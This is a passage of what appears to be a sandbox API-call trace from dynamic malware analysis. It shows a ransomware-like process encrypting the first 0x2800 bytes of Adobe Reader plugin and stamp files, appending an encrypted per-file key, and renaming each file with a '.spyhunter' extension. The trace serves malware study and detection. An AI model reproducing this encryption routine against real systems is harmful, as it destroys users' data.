nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f914, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f914*=0x2800, lpOverlapped=0x0) returned 1 [0117.935] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0117.935] WriteFile (in: hFile=0x17c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f914, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f914*=0x2800, lpOverlapped=0x0) returned 1 [0117.936] GetProcessHeap () returned 0x2c0000 [0117.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0117.936] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.936] WriteFile (in: hFile=0x17c, lpBuffer=0x248f954*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f914, lpOverlapped=0x0 | out: lpBuffer=0x248f954*, lpNumberOfBytesWritten=0x248f914*=0x4, lpOverlapped=0x0) returned 1 [0117.957] WriteFile (in: hFile=0x17c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f914, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f914*=0x30, lpOverlapped=0x0) returned 1 [0117.957] CloseHandle (hObject=0x17c) returned 1 [0117.970] GetProcessHeap () returned 0x2c0000 [0117.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ed7c78 [0117.970] wnsprintfW (in: pszDest=0x2ed7c78, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\StandardBusiness.pdf.spyhunter") returned 114 [0117.970] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cht\\standardbusiness.pdf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\CHT\\StandardBusiness.pdf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\cht\\standardbusiness.pdf.spyhunter")) returned 1 [0117.971] GetProcessHeap () returned 0x2c0000 [0117.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed7c78 | out: hHeap=0x2c0000) returned 1 [0117.971] GetProcessHeap () returned 0x2c0000 [0117.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0117.971] GetProcessHeap () returned 0x2c0000 [0117.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cee548 | out: hHeap=0x2c0000) returned 1 [0117.973] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f950 | out: pbBuffer=0x248f950) returned 1 [0117.974] GetProcessHeap () returned 0x2c0000 [0117.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0117.974] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f948*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f948*=0x30) returned 1 [0117.974] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rum\\standardbusiness.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0117.974] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\StandardBusiness.pdf") returned 104 [0117.974] StrStrW (lpFirst="StandardBusiness.pdf", lpSrch=".txt") returned 0x0 [0117.974] GetProcessHeap () returned 0x2c0000 [0117.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0117.974] ReadFile (in: hFile=0x17c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f90c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f90c*=0x2800, lpOverlapped=0x0) returned 1 [0117.986] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0117.986] WriteFile (in: hFile=0x17c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f90c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f90c*=0x2800, lpOverlapped=0x0) returned 1 [0117.986] GetProcessHeap () returned 0x2c0000 [0117.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0117.986] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0117.986] WriteFile (in: hFile=0x17c, lpBuffer=0x248f94c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f90c, lpOverlapped=0x0 | out: lpBuffer=0x248f94c*, lpNumberOfBytesWritten=0x248f90c*=0x4, lpOverlapped=0x0) returned 1 [0118.009] WriteFile (in: hFile=0x17c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f90c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f90c*=0x30, lpOverlapped=0x0) returned 1 [0118.009] CloseHandle (hObject=0x17c) returned 1 [0118.009] GetProcessHeap () returned 0x2c0000 [0118.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ec7c30 [0118.009] wnsprintfW (in: pszDest=0x2ec7c30, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\StandardBusiness.pdf.spyhunter") returned 114 [0118.009] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rum\\standardbusiness.pdf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\RUM\\StandardBusiness.pdf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\rum\\standardbusiness.pdf.spyhunter")) returned 1 [0118.010] GetProcessHeap () returned 0x2c0000 [0118.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec7c30 | out: hHeap=0x2c0000) returned 1 [0118.010] GetProcessHeap () returned 0x2c0000 [0118.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0118.010] GetProcessHeap () returned 0x2c0000 [0118.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef2b40 | out: hHeap=0x2c0000) returned 1 [0118.010] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f948 | out: pbBuffer=0x248f948) returned 1 [0118.010] GetProcessHeap () returned 0x2c0000 [0118.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0118.010] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f940*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f940*=0x30) returned 1 [0118.010] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\Standard.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\standard.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0118.029] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\Standard.pdf") returned 96 [0118.037] StrStrW (lpFirst="Standard.pdf", lpSrch=".txt") returned 0x0 [0118.045] GetProcessHeap () returned 0x2c0000 [0118.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0118.045] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f904, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f904*=0x2800, lpOverlapped=0x0) returned 1 [0118.057] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.057] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f904, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f904*=0x2800, lpOverlapped=0x0) returned 1 [0118.060] GetProcessHeap () returned 0x2c0000 [0118.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0118.062] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.062] WriteFile (in: hFile=0xec, lpBuffer=0x248f944*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f904, lpOverlapped=0x0 | out: lpBuffer=0x248f944*, lpNumberOfBytesWritten=0x248f904*=0x4, lpOverlapped=0x0) returned 1 [0118.069] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f904, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f904*=0x30, lpOverlapped=0x0) returned 1 [0118.069] CloseHandle (hObject=0xec) returned 1 [0118.075] GetProcessHeap () returned 0x2c0000 [0118.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ec7c30 [0118.075] wnsprintfW (in: pszDest=0x2ec7c30, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\Standard.pdf.spyhunter") returned 106 [0118.075] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\Standard.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\standard.pdf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\Standard.pdf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\standard.pdf.spyhunter")) returned 1 [0118.076] GetProcessHeap () returned 0x2c0000 [0118.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec7c30 | out: hHeap=0x2c0000) returned 1 [0118.076] GetProcessHeap () returned 0x2c0000 [0118.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0118.076] GetProcessHeap () returned 0x2c0000 [0118.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e48368 | out: hHeap=0x2c0000) returned 1 [0118.076] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f948 | out: pbBuffer=0x248f948) returned 1 [0118.076] GetProcessHeap () returned 0x2c0000 [0118.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0118.076] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f940*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f940*=0x30) returned 1 [0118.076] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sve\\signhere.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0118.077] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\SignHere.pdf") returned 96 [0118.077] StrStrW (lpFirst="SignHere.pdf", lpSrch=".txt") returned 0x0 [0118.077] GetProcessHeap () returned 0x2c0000 [0118.077] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0118.077] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f904, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f904*=0x2800, lpOverlapped=0x0) returned 1 [0118.082] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.082] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f904, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f904*=0x2800, lpOverlapped=0x0) returned 1 [0118.083] GetProcessHeap () returned 0x2c0000 [0118.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0118.083] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.083] WriteFile (in: hFile=0xec, lpBuffer=0x248f944*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f904, lpOverlapped=0x0 | out: lpBuffer=0x248f944*, lpNumberOfBytesWritten=0x248f904*=0x4, lpOverlapped=0x0) returned 1 [0118.177] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f904, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f904*=0x30, lpOverlapped=0x0) returned 1 [0118.177] CloseHandle (hObject=0xec) returned 1 [0118.270] GetProcessHeap () returned 0x2c0000 [0118.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ec6058 [0118.270] wnsprintfW (in: pszDest=0x2ec6058, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\SignHere.pdf.spyhunter") returned 106 [0118.270] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sve\\signhere.pdf"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SVE\\SignHere.pdf.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sve\\signhere.pdf.spyhunter")) returned 1 [0118.271] GetProcessHeap () returned 0x2c0000 [0118.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec6058 | out: hHeap=0x2c0000) returned 1 [0118.271] GetProcessHeap () returned 0x2c0000 [0118.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0118.271] GetProcessHeap () returned 0x2c0000 [0118.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e91740 | out: hHeap=0x2c0000) returned 1 [0118.271] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f940 | out: pbBuffer=0x248f940) returned 1 [0118.271] GetProcessHeap () returned 0x2c0000 [0118.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0118.271] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f938*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f938*=0x30) returned 1 [0118.272] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\IA32.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\ia32.api"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0118.277] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\IA32.api") returned 69 [0118.277] StrStrW (lpFirst="IA32.api", lpSrch=".txt") returned 0x0 [0118.277] GetProcessHeap () returned 0x2c0000 [0118.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0118.277] ReadFile (in: hFile=0xec, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f8fc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f8fc*=0x2800, lpOverlapped=0x0) returned 1 [0118.329] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.329] WriteFile (in: hFile=0xec, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f8fc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f8fc*=0x2800, lpOverlapped=0x0) returned 1 [0118.329] GetProcessHeap () returned 0x2c0000 [0118.329] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0118.329] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.329] WriteFile (in: hFile=0xec, lpBuffer=0x248f93c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f8fc, lpOverlapped=0x0 | out: lpBuffer=0x248f93c*, lpNumberOfBytesWritten=0x248f8fc*=0x4, lpOverlapped=0x0) returned 1 [0118.333] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f8fc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f8fc*=0x30, lpOverlapped=0x0) returned 1 [0118.333] CloseHandle (hObject=0xec) returned 1 [0118.333] GetProcessHeap () returned 0x2c0000 [0118.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e95b58 [0118.333] wnsprintfW (in: pszDest=0x2e95b58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\IA32.api.spyhunter") returned 79 [0118.333] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\IA32.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\ia32.api"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\IA32.api.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\ia32.api.spyhunter")) returned 1 [0118.334] GetProcessHeap () returned 0x2c0000 [0118.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e95b58 | out: hHeap=0x2c0000) returned 1 [0118.334] GetProcessHeap () returned 0x2c0000 [0118.334] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0118.334] GetProcessHeap () returned 0x2c0000 [0118.335] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0e0e8 | out: hHeap=0x2c0000) returned 1 [0118.335] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f940 | out: pbBuffer=0x248f940) returned 1 [0118.335] GetProcessHeap () returned 0x2c0000 [0118.335] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0118.335] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f938*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f938*=0x30) returned 1 [0118.335] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\DVA.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\dva.api"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0118.336] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\DVA.api") returned 68 [0118.336] StrStrW (lpFirst="DVA.api", lpSrch=".txt") returned 0x0 [0118.336] GetProcessHeap () returned 0x2c0000 [0118.336] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0118.336] ReadFile (in: hFile=0xec, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f8fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f8fc*=0x2800, lpOverlapped=0x0) returned 1 [0118.403] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.403] WriteFile (in: hFile=0xec, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f8fc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f8fc*=0x2800, lpOverlapped=0x0) returned 1 [0118.404] GetProcessHeap () returned 0x2c0000 [0118.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0118.404] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.404] WriteFile (in: hFile=0xec, lpBuffer=0x248f93c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f8fc, lpOverlapped=0x0 | out: lpBuffer=0x248f93c*, lpNumberOfBytesWritten=0x248f8fc*=0x4, lpOverlapped=0x0) returned 1 [0118.405] WriteFile (in: hFile=0xec, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f8fc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x248f8fc*=0x30, lpOverlapped=0x0) returned 1 [0118.405] CloseHandle (hObject=0xec) returned 1 [0118.589] GetProcessHeap () returned 0x2c0000 [0118.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ec6058 [0118.589] wnsprintfW (in: pszDest=0x2ec6058, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\DVA.api.spyhunter") returned 78 [0118.589] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\DVA.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\dva.api"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\DVA.api.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\dva.api.spyhunter")) returned 1 [0118.591] GetProcessHeap () returned 0x2c0000 [0118.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec6058 | out: hHeap=0x2c0000) returned 1 [0118.592] GetProcessHeap () returned 0x2c0000 [0118.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0118.592] GetProcessHeap () returned 0x2c0000 [0118.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0df38 | out: hHeap=0x2c0000) returned 1 [0118.593] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f938 | out: pbBuffer=0x248f938) returned 1 [0118.593] GetProcessHeap () returned 0x2c0000 [0118.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0118.593] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f930*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f930*=0x30) returned 1 [0118.593] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Checkers.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\checkers.api"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0118.594] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Checkers.api") returned 73 [0118.598] StrStrW (lpFirst="Checkers.api", lpSrch=".txt") returned 0x0 [0118.598] GetProcessHeap () returned 0x2c0000 [0118.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0118.598] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f8f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f8f4*=0x2800, lpOverlapped=0x0) returned 1 [0118.630] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.630] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f8f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f8f4*=0x2800, lpOverlapped=0x0) returned 1 [0118.630] 